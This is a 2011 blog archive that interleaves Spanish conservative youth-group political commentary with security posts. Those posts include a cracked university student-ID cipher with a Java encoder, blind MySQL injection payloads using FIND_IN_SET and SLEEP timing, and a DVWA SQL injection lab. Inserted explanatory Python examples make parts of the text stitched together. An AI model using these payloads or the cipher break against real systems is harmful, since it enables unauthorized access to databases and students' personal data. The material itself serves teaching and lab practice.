Wednesday, May 4, 2011


DEMO: Elevation of Privilege

Well, here's another video showing the procedure to elevate privileges on a Linux system by exploiting a vulnerability in the kernel. A shell had previously been obtained with meterpreter.




Greetings.

Monday, May 2, 2011


One murderer less.



I could not have woken up today to better news than the death of Bin Laden, a terrorist who since 1988 has led an amalgam of autonomous groups known as Al-Qaeda (The Base), which has claimed the lives of thousands of people in pursuit of imposing an Islamic theocracy on the world. A theocracy, of course, incompatible with democracy and Western freedoms. That is why we and our Western partners were its prime targets. But, one way or another, we learned to stand up to international terrorism through a long, hard but ultimately effective fight, and we got rid of this barbarian. The reader will notice that I say "we", and yes, I mean all Western societies, all those citizens who have always stood firm against murderers, at home or abroad, and have always remained on the side of the victims that terrorists leave behind. So this post is a tribute to them, and especially to the victims.

http://www.youtube.com/watch?v=m225Da69DnY&feature=related

Sunday, May 1, 2011


Linux DEMO: SQL Injection Exploitation

Hi, this is the demo I did for the talk that a friend and I gave on Saturday at FLISOL (UNAC).

The video shows how to exploit a SQL injection to obtain a meterpreter session on the remote system and take control of it.



Greetings.

Wednesday, April 27, 2011


TVE, the channel of all?

Many voices have been raised over the exchange of views between the Secretary General and the presenter Ana Pastor. Here we pick the turning point of the discussion, where the leader of our party responded calmly and with arguments to the questions and subsequent insinuations of the interviewers.

But it does not stop there. From NNGG Ciudad Lineal we believe that since the Socialists came to power they have used the manipulation of information as a weapon dedicated to perpetuating themselves in it, just as many who share their ideas have done. Here are some examples:

But it does not stop there. Possibly the peak was reached at the final of the Copa del Rey between FC Barcelona and Athletic Club Bilbao, when the anthem of all was kept from the Spanish audience, hiding an obvious reality.

From NNGG Ciudad Lineal we do not accept this, and besides denouncing TVE's manipulation we also say from here that the anthem of Spain, the anthem of all, should never be censored. And since we were talking about football, here is the anthem on a magical night that began at that very moment.


Chat FLISOL

As you know, at FLISOL, besides installing free GNU/Linux distros, there are also lectures on many aspects of free software and its applications. Some of these talks are given by members of OSS communities, but also by companies and related professionals. Well, San Marcux (the group I am a member of) was invited to take part in FLISOL (UNAC site), so we went to give a talk.

Then a friend suggested I talk about a computer (in)security topic and, since I had no excuse (I have every Saturday off), I could talk about SQL injection. He, meanwhile, planned to talk about social engineering and do some demos with SET (Social Engineering Toolkit). In the end we agreed to talk about both things and named the talk "2 attack vectors against organizations". We

are scheduled for Saturday at 10:45 in Auditorium 1. So if you have time, I invite you to drop by and maybe learn something interesting. For my part, I will not go into much depth (not enough time), but I will do a demo on how to exploit a SQLi to gain access to the system.

I'll be honest, it will be the first time I give a lecture or anything similar. So I just hope everything goes well, that the demo does not fail and that people understand me.

Greetings.

Monday, April 25, 2011


GREAT SPEECHES IN HISTORY Che Guevara VI

Again, as is usual in our newsroom, we bring you the section "Great Speeches in History". For this entry we have selected speeches by three major figures: Robert Kennedy, John Paul II and Mariano Rajoy.

These figures have been of great significance in the historical moment in which they lived, and others, like Mariano Rajoy, will be very soon.

We hope you enjoy these great speeches and leave us your opinions as usual.





PART V PART IV PART III PART II PART I
VISIT www.nnggclineal.org

Friday, April 22, 2011


MURDERER MURDERER!

For years Socialist propaganda has built an idyllic image of Che Guevara as a man concerned about the poorest. Nothing could be further from reality.

Ernesto Guevara was an Argentinian who studied medicine but never earned a degree in that science. He soon marched across America fighting the capitalism imposed by the "U.S. empire", but what was his fight?

Che's fight was to crush anything that smelled of "capitalism"; the methods and the consequences were all the same to him. Thanks to this character, the Cuban people now enjoy their idyllic "democracy", and thousands of people have never been able to meet their parents and grandparents, executed at the hands of this savage.
Che delighted in bloodthirsty killing, showing no compassion of any kind, and those who did not die against a wall were simply put under the yoke of communism.





Thursday, April 21, 2011


laughter! 2011 Easter




We launch this new comic section on the blog, which I will bring you from time to time. In life there are many important things, and one of them is to laugh. We hope you laugh a lot and propose more funny videos.






If lately you have been considering installing a Linux distro and switching to free software, but still do not dare to take the plunge, here is your chance. Next April 30, FLISOL (Latin American Free Software Installation Festival) will be held.

FLISOL is an international event for the dissemination of free software that has been held every year since 2005. It takes place in parallel in many cities around the world, where the various OSS communities of each locality are responsible for organizing it.

At FLISOL, many GNU/Linux and free software enthusiasts install and configure distros, free of charge, on the equipment that attendees bring. All of it, of course, completely free and legal.

Besides installing the distro of your choice, FLISOL also holds lectures, presentations and workshops on free software and its philosophy in its different forms of expression: artistic, academic, business and social.

This time the "UNACINUX" community of the National University of Callao will be responsible for organizing the FLISOL Callao site. You can find more information on their website:

http://csl.unac.edu.pe/flisol2011/

Besides Callao, Peru will host 17 other sites spread across different cities of our country. You can consult the list of sites for Peru (and other countries too) on the official FLISOL website:

http://flisol.net/

No excuses, you are all invited to FLISOL. See you there.

A greeting.




Another year, as is tradition in Spain, the streets of our towns and cities smell of incense and are stained red by the rose petals thrown by the faithful. Our country is a living example that old traditions still enjoy popular support, because, regardless of each person's beliefs, during these rainy days we see in our neighbours' eyes that feeling of peace and reconciliation.

Processions, like Christianity, are part of Spain's identity, without which we would not understand its history, let alone its people. However much it may bother some, in Spain there are things that will never disappear: the bulls, going to mass, flamenco, the siesta and the after-lunch cigarette, among others. We are proud of our customs; we are proud of being, feeling and believing in SPAIN.


Sunday, April 17, 2011


New Generations: Being, Feeling, Extending Freedom. Weekly review special. Contrasts

NNGG Ciudad Lineal has just returned from the wonderful journey we made to Aragon and Catalonia on the occasion of the 13th NNGG National Congress, so we could not publish on the blog in the usual way, but here are our views of the fantastic experience of the Congress. During the days of the Congress, hundreds of young people from all over our dear country met to seek solutions to the problems of the future of this country, in a commendable atmosphere of friendship, closeness and dialogue. An important event took place within NNGG itself: the change of president, with Beatriz Jurado, from Córdoba, taking over.

In these days, besides the election of Beatriz Jurado, we can try to condense in a few lines what was discussed and debated there. NNGG reaffirmed its support for individual freedom, for people living free and not being subjected to grand promises, petty or foolish, like those we are accustomed to from our country's government. And we believe this because we believe that people know how to choose; nobody needs to tell citizens what they have to do. We believe that real progress comes when there is freedom, not with a rigid labour market or by "squeezing" citizens with taxes. Another idea validated was the need to find solutions to ensure the viability of the autonomous regions. We do not want overlapping administrations, we do not want barriers to the free movement of people in any sense; in short, we do not want a grandiose idea of a region to end the freedom of an entire country. And this was the line of the proposals, based on the pursuit of freedom.

And that is what beats within NNGG: what we are, what we feel and what we want to extend.


Saturday, April 16, 2011






A few days have passed since April 14, the date on which those who live in the past returned to vindicate the Spain that looks to the past and not to the future. Coincidentally, NNGG Ciudad Lineal was in Zaragoza during these days, and for that reason we came to visit the Aragonese town of Belchite, where one of the most terrible battles of the Civil War was fought, a wound that still festers in the public conscience.

Modern Belchite is a village typical of many that exist in Spain, with its locals and scenic spots. But alongside the modern homes stand some collapsed buildings, a wasteland of rubble that represents the ultimate failure of a generation, of an entire society, the Spain of '31. A society that, after the dictatorship of Miguel Primo de Rivera, was unable to channel its feelings into the creation of a functioning democracy, a modern democracy like the one we have today, which was the result of a society that did know how to channel its efforts in '78.

We see the contrast between the two cases, between the constitutional monarchy and the Republic that failed, and the anarchy now vindicated by irresponsible radicals who seek to take risks and crush the system of freedom we live in, to promote "something" they do not quite know what it is.
But we have witnessed what irresponsibility produces, without regard for what people want, only hatred and confrontation, turning a people who were once the jewel of the region into one ravaged by confrontation between brothers.


Monday, April 11, 2011


"Prudence, common sense and knowing how to prioritize". Weekly review

Prudence, common sense and knowing how to prioritize: these are the simple words with which the PP in Madrid has marked the limits of the actions proposed in our manifesto for the city council, by the hand of our mayor, Alberto Ruiz-Gallardón. In a crisis, large investments are parked, seeking accounts as healthy as possible with no impact on the most vulnerable side of the income-expenditure equation, the citizen's pocket. Madrid's future in the coming years does not run through great works; the Ruiz-Gallardón team considers that it is time to plan.

They propose a new General Plan and a reform of the administration to streamline it and make it more efficient: intensify the use of the facilities we already have, extending their hours, and give more weight in many cases to private initiative, so as to "provide the best service at the lowest cost".
And cost is one of the key points: the crisis affects everyone's pocket, and we cannot separate the government from the citizens as if some were a "macro-pocket" of the others. Hence the belt-tightening, now reaping what was sown with such effort. This is where the idea of not raising taxes fits in, with a review to make property tax proportional to the economic capacity of the owner.

Finally, the Mayor's team is doing an excellent job by incorporating among its proposals the wishes of the people who have sent proposals to the official website, at a rate of 2000 a week at its peak. Among all these proposals the most recurrent themes seem to be improving the road network, increasing bicycle use and cleaning the streets, including calls to combat graffiti, etc. These are, briefly, the proposals of the next Mayor of the City of Madrid, Alberto Ruiz-Gallardón.

Sunday, April 10, 2011


Election 2011

My opinion of the results so far:


4. Again

It seems that the sun has finally arrived, and now it is here to stay. The members of New Generations Ciudad Lineal have had a busy week of events, and every day a radiant sun has been with us.

Nationally we have seen how the public increasingly shows signs of fatigue with the lying government and all it represents. Saturday's demonstration showed that Spanish citizens want ETA to end, not by giving concessions but by differentiating between winners and losers and telling ETA very clearly that they have lost. And the political landscape of the week to come will have to account for this event. We note here the duplicity and disrespect with which the Prisa Group's newspaper treated the event, having the nerve to say that the demonstration was an act of support for the government and of thanks for its anti-terrorist policy... In another vein, the sovereigntist consultations in Catalonia, organized by the usual suspects, have once again failed to show that the public is interested in independence and confrontational speech; rather, people want to work and lead a happy life.

On the international scene it seems that the dust is settling. Japan has returned to calm. Libya is still in its civil war, modulated by the support the allies give the rebels, while in Africa it seems that the polls will finally succeed in choosing presidents, under the democratic "protection" that France is providing. And looking at Latin America, we look at the elections in Peru. These will ultimately decide whether another brother country falls into the Bolivarian socialist network, or rather slams the door on these outdated ideas and commits to the future that only liberalism and democracy can guarantee.

Saturday, April 9, 2011


SCU encryption solved

Hello again... you may recall that in the middle of last year I found an error on the website of the library's SCU (System Control Register). That mistake allowed anyone to query and modify the data printed on the library card of any student of the university (as a PoC we changed Solomon's sex xD).

The error was reported and corrected weeks later. But the solution did not convince me at all: it was only to encrypt the variable that was causing the problem. That does not fix the cause of the error itself; it only makes exploiting it harder.

Since then, the SCU encryption was proposed as a challenge. If we could find out how the students' codes were encoded, we could continue to access any student's information. Recently we took this up and succeeded.

In this post I will explain, superficially, the analysis that led us to solve the SCU encryption.

As you know, student codes consist of 8 digits, which can be grouped as follows: the first 2 represent the year of entry, the next 3 are the code of the faculty to which the student belongs, and the last 3 are used as a sequential serial number.

Encrypted codes, in turn, are 16 digits long; e.g. "A55E33BE219A8420" corresponds to "08200090". Furthermore, among the characters used we see both numbers and letters such as "A", "B" and "E", which suggests a hexadecimal representation. So we can map each digit of the code to a pair of digits of the encrypted code. But this mapping varies with the position, i.e. we are talking about some sort of polyalphabetic substitution cipher.

Another interesting observation is that if the encrypted code is grouped in pairs, the first digit of each pair never varies. Example:

08200090 -> A5 5E 33 BE 21 9A 84 21
07202013 -> A5 51 33 BE 23 9A 8C 22
06114132 -> A5 53 30 BF 25 9B 8E 23

Moreover, it appears that each pair is independent of the others and has its own substitution table. I say this because, if you look, the first digit "0" of the sample codes is always represented by "A5", and the third digit "2" of the first two codes is always represented by "33".

Well, knowing this, and since the last three pairs should correspond to the serial number, I took the code assigned to me and tried replacing the last digit with the values from 0 to F. I got the following substitution table:

DIGIT   CODED
0       21
1       20
2       23
3       22
4       25
5       24
6       27
7       26
8       29
9       28

It is incredibly simple: they just swapped positions two by two

xD Then I tried the penultimate digit in the same way and got this substitution table:

DIGIT   CODED
0       8D
1       8C
2       8F
3       8E
4       89
5       88
6       8B
7       8A
8       85
9       84

Here we also observe an exchange pattern, but a slightly trickier one. It is obtained like this (digit, then the value after each of the three exchanges):

0 -> 1 -> 5 -> D
1 -> 0 -> 4 -> C
2 -> 3 -> 7 -> F
3 -> 2 -> 6 -> E
4 -> 5 -> 1 -> 9
5 -> 4 -> 0 -> 8
6 -> 7 -> 3 -> B
7 -> 6 -> 2 -> A
8 -> 9 -> D -> 5
9 -> 8 -> C -> 4
A -> B -> F -> 7
B -> A -> E -> 6
C -> D -> 9 -> 1
D -> C -> 8 -> 0
E -> F -> B -> 3
F -> E -> A -> 2

Here there are 3 exchanges. First, the digits are exchanged two by two. Then they are grouped in fours and the groups are swapped in pairs. Finally they are grouped in eights and the two groups are exchanged.

Well, I think by now we have a pretty good idea of what is being done: for each digit of the code there is a different number of grouped exchanges, made in different ways, and that is it.

It should also be said that exchanging two by two and grouping by powers of 2 makes the encryption a reflection, that is, if a digit "X" is coded as "Y", then "Y" is coded as "X". This property was very useful for collecting more data.

The procedure, then, for each digit was to obtain some mappings, then apply the reflection to double the information, and finally infer the exchanges and groupings made for that digit.

Finally, I leave a script I wrote in Java that computes the encryption of the codes passed as parameters.

    public class SCUCrypt {
        // Substitution table recovered above: crack_table[position][digit] -> hex pair
        private static final String[][] crack_table = {
            {"A5", "A4", "A7", "A6", "A1", "A0", "A3", "A2", "AD", "AC"},
            {"56", "57", "54", "55", "52", "53", "50", "51", "5E", "5F"},
            {"31", "30", "33", "32", "35", "34", "37", "36", "39", "38"},
            {"BE", "BF", "BC", "BD", "BA", "BB", "B8", "B9", "B6", "B7"},
            {"21", "20", "23", "22", "25", "24", "27", "26", "29", "28"},
            {"9A", "9B", "98", "99", "9E", "9F", "9C", "9D", "92", "93"},
            {"8D", "8C", "8F", "8E", "89", "88", "8B", "8A", "85", "84"},
            {"21", "20", "23", "22", "25", "24", "27", "26", "29", "28"}
        };

        // Encodes each decimal digit of the code with the table for its position.
        public static String hashcode(String code) throws IllegalArgumentException {
            if (code.length() > 8) {
                throw new IllegalArgumentException();
            }
            String hashcode = "";
            for (int i = 0; i < code.length(); i++) {
                try {
                    int index = Integer.parseInt(code.substring(i, i + 1));
                    hashcode += crack_table[i][index];
                } catch (Exception e) {
                    // non-numeric character or digit out of range
                    throw new IllegalArgumentException();
                }
            }
            return hashcode;
        }

        public static void main(String[] args) {
            if (args.length < 1) {
                System.out.println("SCUCrypt 1.0 ( http://alguienenlafisi.blogspot.com )");
                System.out.println("Author: One");
                System.out.println("Usage: java SCUCrypt {code1 [code2 [code3 ...]]}");
                System.out.println("Example: java SCUCrypt 03200254");
                System.out.println("Enjoy! }:]");
            } else {
                for (String code : args) {
                    try {
                        String hashcode = hashcode(code);
                        System.out.println("[+] " + code + " -> " + hashcode);
                    } catch (Exception e) {
                        System.out.println("[-] ERROR. " + code + " is not a valid code.");
                    }
                }
                System.out.println("[+] Done.");
            }
        }
    }
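As an added example (my own code, not the post's script), the three exchanges described above are exactly the bit flips of an XOR: every position encodes a digit as a fixed tag nibble followed by "digit XOR key nibble", which is why each table is its own reflection. This generalizes the post's per-digit tables; CRACK_TABLE is copied from the SCUCrypt script above, while the function names and the decode/key-recovery helpers are assumptions of mine.

```python
"""Added example, not the blog's code: model the SCU substitution as a
per-position XOR with a fixed key nibble behind a fixed tag nibble, and show
that the post's 'swap 2x2 / 4x4 / 8x8' exchanges compose to that XOR."""

# Copied from the post's SCUCrypt script: CRACK_TABLE[position][digit].
CRACK_TABLE = [
    ["A5", "A4", "A7", "A6", "A1", "A0", "A3", "A2", "AD", "AC"],
    ["56", "57", "54", "55", "52", "53", "50", "51", "5E", "5F"],
    ["31", "30", "33", "32", "35", "34", "37", "36", "39", "38"],
    ["BE", "BF", "BC", "BD", "BA", "BB", "B8", "B9", "B6", "B7"],
    ["21", "20", "23", "22", "25", "24", "27", "26", "29", "28"],
    ["9A", "9B", "98", "99", "9E", "9F", "9C", "9D", "92", "93"],
    ["8D", "8C", "8F", "8E", "89", "88", "8B", "8A", "85", "84"],
    ["21", "20", "23", "22", "25", "24", "27", "26", "29", "28"],
]


def swap_blocks(table, size):
    """Exchange adjacent blocks of `size` entries: size 1 is the post's
    'two by two', size 4 its 'groups of four', size 8 its 'groups of eight'."""
    out = []
    for i in range(0, len(table), 2 * size):
        out += table[i + size:i + 2 * size] + table[i:i + size]
    return out


def table_from_stages(sizes):
    """Apply the exchanges in order to the 16 hex digits; returns the map."""
    t = list(range(16))
    for size in sizes:
        t = swap_blocks(t, size)
    return t


def stages_for_key(key):
    """Block sizes whose pairwise exchange composes to XOR `key` (its set bits)."""
    return [1 << b for b in range(4) if key >> b & 1]


def recover_key(position):
    """(tag, key) for a position: with XOR, one known digit reveals the key,
    and the encoding of digit 0 is the key itself."""
    pair = CRACK_TABLE[position][0]
    return int(pair[0], 16), int(pair[1], 16)


TAGS, KEYS = zip(*(recover_key(p) for p in range(8)))


def encode(code):
    """Encrypt an 8-digit student code the SCU way (XOR model)."""
    if len(code) != 8 or not code.isdigit():
        raise ValueError("code must be exactly 8 decimal digits")
    return "".join(f"{TAGS[i]:X}{int(d) ^ KEYS[i]:X}" for i, d in enumerate(code))


def decode(encoded):
    """Invert encode(); rejects pairs whose tag or decoded digit is impossible."""
    if len(encoded) != 16:
        raise ValueError("encoded code must be 16 hex digits")
    digits = []
    for i in range(8):
        tag, value = int(encoded[2 * i], 16), int(encoded[2 * i + 1], 16)
        digit = value ^ KEYS[i]
        if tag != TAGS[i] or digit > 9:
            raise ValueError(f"pair {i} ({encoded[2 * i:2 * i + 2]}) is not a valid encoding")
        digits.append(str(digit))
    return "".join(digits)


def xor_model_matches_table():
    """True when the XOR model reproduces every entry of the post's table."""
    return all(
        f"{TAGS[p]:X}{d ^ KEYS[p]:X}" == CRACK_TABLE[p][d]
        for p in range(8) for d in range(10)
    )


if __name__ == "__main__":
    print(xor_model_matches_table())
    print(encode("03200254"), decode(encode("03200254")))
    print(table_from_stages([1, 4, 8]))  # penultimate digit: 0->D, 1->C, ...
```

Because the key nibbles never change and carry no secret beyond one known plaintext/ciphertext pair, this is obfuscation rather than encryption, which is the point the post makes about the "fix".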


A greeting.

Update: I leave a capture showing how to compile and use the script.

Fig. 1 - Using SCUCrypt.

Monday, April 4, 2011


"green shoots". Weekly review

Another month the unemployment data arrive, and another month harsh reality contradicts our government's statements about an imminent recovery. In fact, on 9 March ZP last spoke of recovery in Congress, and the data again refute what he said. It is even more insulting when we observe that since July 2010 no jobs have been created in Spain, and that our country is the only one with an unemployment rate above 20%. We also see that the data are similar to last year's, when the then Secretary of Employment, Maravillas Rojo, argued that the recovery had begun... so we see that what the socialists call recovery is, for the rest of the population, a generation being burned by the lack of opportunities.

We could go on giving data and demonstrating the stubborn reality, but it would only be restating the same thing over and over without getting anywhere. The famous "green shoots" dried up long ago, if they were ever born, because the seeds planted by the socialists were bad and the public no longer believes a lying government. The PSOE opted for expansionary spending measures which were not only inappropriate for the times we lived in (they are used to grow the economy in times of prosperity) but were also as stupid (Plan E) as they were ineffective at stimulating the economy; they only served as a temporary patch, trying to go against reality and the macroeconomic data.

A few days ago I read a report on how Iceland weathered the crisis, despite the dramatic way it was hit, by keeping the government practically out of its economy. Adam Smith was the first to talk about the invisible hand in the economy, the idea that the market regulates itself. And if you look at the Spanish economy you will see that the most important problems are the national debt, the capitalization of the savings banks, etc. All situations in which we perceive the government's hand.

Little remains for the PP to return to government, for these eight years to become a mere parenthesis in the period of progress begun by the Aznar governments. Hopefully it will not be too late when that time comes, and a generation of young workers will not be lost.


Sunday, April 3, 2011


FIND_IN_SET: Optimized Blind MySQL Injection Data Retrieval Web SQL Injection Attacks

Today, reading the blog "Security By Default", I learned about another optimization for extracting data through blind SQL injections in MySQL. I say "another" because, as you may recall, I recently talked about Bit Shifting, a technique with the same purpose.

The technique is called "FIND_IN_SET". The article on the author's website can be found here.

So in this post I will explain what I understood of this new technique, which I believe provides a significant improvement in efficiency.

FIND_IN_SET is actually a MySQL function that returns the position of a string within a comma-separated set. For example:

mysql> SELECT FIND_IN_SET('e', 'a,e,i,o,u');
+-------------------------------+
| FIND_IN_SET('e', 'a,e,i,o,u') |
+-------------------------------+
|                             2 |
+-------------------------------+

The idea is to obtain the position of the character we are looking for within our set with FIND_IN_SET(). The next step is to get the binary string representation of that position, which can be achieved with the BIN() function. Finally, the binary string is split into individual characters, which can only be '0' or '1', representing a false or true response respectively. Thus we can deduce the binary string of the position and therefore the character.

Fig. 1 - The FIND_IN_SET technique.

Why is this technique more efficient? The answer is that the number of queries needed to infer a binary sequence equals the number of bits of that sequence. As we know, a character needs 8 bits to be represented, i.e. 8 queries are needed to deduce a character. On the other hand, a position, or any numeric value, can be represented with fewer bits, and thus fewer queries are needed. Let's see:

# BITS   BINARY               DECIMAL
1        0 - 1                0 - 1
2        10 - 11              2 - 3
3        100 - 111            4 - 7
4        1000 - 1111          8 - 15
5        10000 - 11111        16 - 31
6        100000 - 111111      32 - 63
7        1000000 - 1111111    64 - 127

So, in order to obtain the binary string that represents the position, we need as many queries as bits that string contains.

Maybe now you are wondering: unless we know the position, we do not know how many bits it has, so how do we know how many queries to make? It's simple: we cannot know. So we must keep issuing queries until the next character of the binary string returns an empty string (''). That is the condition that signals the end of the queries, and we must express it somehow. The author proposes two ways: generating an error, or adding a delay (delayed response). Now, this mechanism needs one further query, the one that tells us we are done. Therefore the total number of queries will be one more than the number of bits of the position.


All that said, let's see an example of this technique.

SELECT ((SELECT @a:=MID(BIN(FIND_IN_SET(MID(USER(),1,1),'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\, ,')),1,1))=@a AND IF(@a!='',@a,SLEEP(4)));

The example gets the name of the MySQL user with USER(), then takes the first character of the name with MID(), calculates the position of that character in the set with FIND_IN_SET(), gets the binary string representation of that position with BIN(), takes the first character of the binary string, again with MID(), and assigns it to the variable "@a". All this is inside a SELECT whose only purpose is to initialize the variable @a. The result of that SELECT is compared with @a; note that this will always be true, it is like comparing "@a = @a". This is done because the injection is in a WHERE clause and must therefore be expressed as a condition. That condition is ANDed with the result of the IF() function, which checks that @a is not an empty string. If that condition is met the result will be @a (which is 0 or 1, i.e. false or true); if not, a 4-second delay is executed. Complicated enough explanation; let's see how it works:

mysql> SELECT ((SELECT @a:=MID(BIN(FIND_IN_SET(MID(USER(),1,1),'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\, ,')),3,1))=@a AND IF(@a!='',@a,SLEEP(4)));
1 row in set (4.00 sec)


The result was "10010", which corresponds to the eighteenth position. The final 0 is not counted; it corresponds to the query that caused the 4-second delay. If we look at our set, the character "r" occupies position 18, and it is the first letter of the user (root@localhost). Using this technique we have deduced a character with only 6 queries, more efficient than Binary Search and Bit Shifting, which require 8 queries.


Fig. 2 - Efficiency comparison.

Some problems
There is a problem using the FIND_IN_SET() function: it is not case sensitive. Therefore, if the set had an 'a' in the first position and an 'A' in the twenty-seventh, every time we query for 'a' or 'A' it will return the first match, in this case 1. Because of this, we will have a very significant loss of accuracy when the information to extract consists of structure names or passwords.


Another drawback is that if we consider a set of characters that is broad enough, from position 64 to 127 there is no improvement, and from 128 to 255 it will require 9 queries, i.e. less efficient than the previous methods. If we consider the extended ASCII set, we could say that it only improves efficiency in a quarter of the cases.


Finally, the fact of including a delay to mark the end of the queries also reduces the efficiency of this method, since ultimately the aim is to save time.



Some solutions

To fix the "case sensitive" issue, it occurred to me to use the INSTR() function, which returns the position of the first occurrence of a string within another. This function is case sensitive only when one of its parameters is a string of type BINARY. For example:

mysql> SELECT INSTR('aA', CAST('a' AS BINARY));

The injection built with INSTR() instead of FIND_IN_SET() keeps the same ending (only this tail of it survives here):

..., 1,1))=@a AND IF(@a!='',@a,SLEEP(4)));



To overcome the second problem there are some optimizations that can be implemented:

1. Reduce the set as much as possible, for example by removing unprintable characters and strange extended ASCII symbols. That would leave approximately half.
2. Sort the characters of the set according to their frequency in a given language: the most frequent first and the least common at the end.
3. An interesting observation is that the first query always returns 1, unless the character being searched for is not in the set. Knowing this we can skip the first query and start with the second. If the second query triggers the delay, that is what the first would have told us; otherwise we can infer that the result of the first was 1. That saves one query.
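As an added example (not from the post or its source article), here is a local model of the query cost of the FIND_IN_SET/BIN scheme. It checks the figures above (6 queries for "r" at position 18; only about a quarter of extended ASCII beats the 8 queries of bit shifting) and illustrates the case-insensitivity problem together with the frequency-ordering and skip-first-query optimizations. No database is involved: `find_in_set` and the constructed CHARSET only mimic MySQL's behaviour, and every function name is an assumption of mine.

```python
"""Added example, not the post's code: query-cost model for the FIND_IN_SET
scheme (one query per bit of BIN(position) plus one terminating query)."""

from collections import Counter

# Constructed to mirror the set used in the post's injection, one element per
# character (in MySQL it is a comma-separated string).
CHARSET = list("abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()-+=,.\"'~`\\ ")


def find_in_set(needle, charset, binary=False):
    """Model of MySQL FIND_IN_SET(): 1-based position of the first match, 0 if
    absent.  The default collation compares case-insensitively; binary=True
    models the INSTR(..., CAST(x AS BINARY)) workaround from the post."""
    for pos, member in enumerate(charset, start=1):
        if member == needle or (not binary and member.lower() == needle.lower()):
            return pos
    return 0


def queries_for_position(position, skip_first=False):
    """Queries needed: one per bit of BIN(position) plus the query that returns
    '' (the SLEEP/error signal).  skip_first drops the leading bit, which is
    always 1 for any position >= 1 (the post's third optimisation)."""
    if position < 1:
        raise ValueError("position must be >= 1")
    return len(bin(position)[2:]) + 1 - int(skip_first)


def queries_for_char(ch, charset, skip_first=False):
    """Queries needed to extract `ch`, or None if it is not in the set."""
    pos = find_in_set(ch, charset)
    return queries_for_position(pos, skip_first) if pos else None


def efficiency_profile(set_size, baseline=8, skip_first=False):
    """How many positions of a `set_size`-member set need fewer, the same, or
    more queries than `baseline` (bit shifting: 8 queries per character)."""
    counts = Counter()
    for pos in range(1, set_size + 1):
        q = queries_for_position(pos, skip_first)
        counts["better" if q < baseline else "same" if q == baseline else "worse"] += 1
    return dict(counts)


def ambiguous_chars(charset, binary=False):
    """Members that FIND_IN_SET cannot distinguish from an earlier member
    because of case-insensitive matching (the 'a' versus 'A' problem)."""
    return [c for pos, c in enumerate(charset, start=1)
            if find_in_set(c, charset, binary) != pos]


def frequency_ordered(charset, sample_text):
    """Reorder the set so the characters most frequent in `sample_text` come
    first (the post's second optimisation); every member is kept."""
    freq = Counter(sample_text)
    return sorted(charset, key=lambda c: (-freq[c], charset.index(c)))


def average_queries(text, charset, skip_first=False):
    """Mean number of queries needed to extract each character of `text`."""
    costs = [queries_for_char(c, charset, skip_first) for c in text]
    if any(c is None for c in costs):
        raise ValueError("text contains characters outside the set")
    return sum(costs) / len(costs)


if __name__ == "__main__":
    print(queries_for_char("r", CHARSET))          # 6, as in the post
    print(efficiency_profile(255))                  # 63 of 255 positions beat 8
    print(efficiency_profile(255, skip_first=True)) # none worse once bit 1 is skipped
    print(ambiguous_chars(CHARSET + ["A"]))         # ['A'] collides with 'a'
    sample = "root@localhost"                       # constructed sample value
    print(average_queries(sample, CHARSET),
          average_queries(sample, frequency_ordered(CHARSET, sample)))
```

For a defender, the same arithmetic explains what to look for: the scheme is visible as bursts of near-identical requests containing FIND_IN_SET, BIN and SLEEP, one of which takes several seconds longer than the rest.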
For the third problem, the author proposes a case in which it could be resolved: when different pages are displayed according to a parameter (/page.php?id=0, /page.php?id=1). In that case we could use 3 different pages to represent 0, 1 and the end of the queries. The injection, in that case, could take this form:

IF(@a:=MID(BIN(FIND_IN_SET(MID(USER(),1,1),'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&,*(,),-,+,=,\,,.,",\',~,`,\\,

...is vulnerable to SQL injection. What you will learn in this and the following parts of the series are some techniques to exploit these vulnerabilities. By "exploit" I mean compromising the security of the organization, either by obtaining privileged information or access.
But first let's set up a vulnerable environment to practise in. We will use Damn Vulnerable Web App (DVWA), an intentionally vulnerable web application that will let us practise and learn about web vulnerabilities without getting into trouble with the law xD

DVWA can be downloaded from here:

http://sourceforge.net/projects/dvwa/files/DVWA-1.0.7.zip/download
As the first part showed how to install XAMPP, I will assume you already have it on your machine. If not, take a look here:
http://alguienenlafisi.blogspot.com/2011/01/sql-injection-web-attacks-parte-i.html
The downloaded file is a zip. Extract its contents into the directory
/opt/lampp/htdocs

(root privileges are needed):

# unzip DVWA-1.0.7.zip -d /opt/lampp/htdocs/

Now we need to set the parameters so that DVWA can access the database.

open the file / opt / lampp / htdocs / dvwa / config / config.inc.php
# gedit / opt / lampp / htdocs / dvwa / config / config.inc.php

You only need to set the password of the MySQL root user in the variable $_DVWA['db_password']:

<?php
# Database management system to use
$DBMS = 'MySQL';
#$DBMS = 'PGSQL';

# Database variables
$_DVWA = array();
$_DVWA['db_server']   = 'localhost';
$_DVWA['db_database'] = 'dvwa';
$_DVWA['db_user']     = 'root';
$_DVWA['db_password'] = 'rootpassword'; // put the root password of your MySQL here

# Only needed for PGSQL
$_DVWA['db_port'] = '5432';
?>

Then, if XAMPP is not running, we start it with:

# /opt/lampp/lampp start

 
Now open http://localhost/dvwa in the browser. We see something like this:

Fig. 1 - Error because the database does not exist yet.



We click on "here". Another page loads which displays a button to create the DVWA database. Click it.

Then log in with:
Username = admin
Password = password

You'll see a page like this:

Fig. 3 - DVWA main page.

I have highlighted in green the different vulnerabilities we will practise with. Below, highlighted in yellow, is the menu to change the difficulty of DVWA. DVWA allows 3 levels of difficulty: low, medium and high. The default is high, so you should switch it to low.
 
Our environment is now ready for practice. Let's continue...

6 Extracting data

Let's start learning some techniques for data extraction. To do this, select the "SQL Injection" vulnerability (at low level). It displays a form to search for a user by id where, for example, if you enter 1 it will show the details of the user "admin".


 


Fig. 4 - SQL Injection Vulnerability.





Well... let's do a simple test to verify that the form is vulnerable to SQLi. We enter a single quote (') and press "Submit". You will see an error message like this:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

Excellent, this means that we can alter the syntax of the SQL query. We will do another test, now with a tautology, to confirm it. Enter:

' or ''='

 


Fig. 5 - Check by tautology.

